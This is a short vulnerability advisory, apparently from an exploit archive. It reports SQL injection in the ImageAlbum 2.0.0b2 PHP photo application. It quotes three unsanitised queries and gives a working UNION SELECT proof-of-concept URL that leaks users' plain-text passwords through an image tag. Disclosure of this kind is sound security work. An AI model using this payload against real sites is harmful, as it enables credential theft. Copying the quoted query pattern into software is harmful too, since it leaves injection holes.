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ImageAlbum 2.0.0b2 (id) Remote SQL Injection Vulnerability

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ImageAlbum 2.0.0b2 (id) Remote SQL Injection Vulnerability

ImageAlbum Remote SQL Injection Vulnerabilities

Product: ImageAlbum
Version: Latest 2.0.0b2, others not tested
Vendor:  http://imagealbum.sourceforge.net/
Date:     01/10/08

- Introduction

ImageAlbum is a web application written in PHP for displaying and editing
picture collections.  It features user accounts and picture comments.

- Details

Multiple SQL injection vulnerabilities exist, that can result in user
credentials being compromised or the modification of the database.

In classes/IADomain.php
$sql = "SELECT * FROM `iaimage`
WHERE `id` = $id AND `domain_id` = $this->id LIMIT 1";

In classes/IACollection.php
$sql = "SELECT * FROM `iacollection` WHERE `id` = $this->id";

In classes/IAUser.php
$sql = "SELECT * FROM `iauser` WHERE `id` = $this->id";

Other SQL statements in the application are also vulnerable.

- Proof of Concept

The following example exploits the image viewer page by placing the password
of a user into the src attribute of the img tag instead of the correct path
to the image.  User passwords are stored in plain-text.

http://[site]/index.php/[domain]/?action=collection.imageview&id=643635 union all select iaimage.id, iaimage.name, description, iaimage.collection_id, iaimage.domain_id, password As path, access, visits, checked FROM iaimage, iauser WHERE iaimage.id=411 /*

Note, 643635 is an invalid image id and 411 is a known valid image id.

- Solution

Edit the source code to insure that all user input is properly sanitised.

#  0day.today [2024-10-06]  #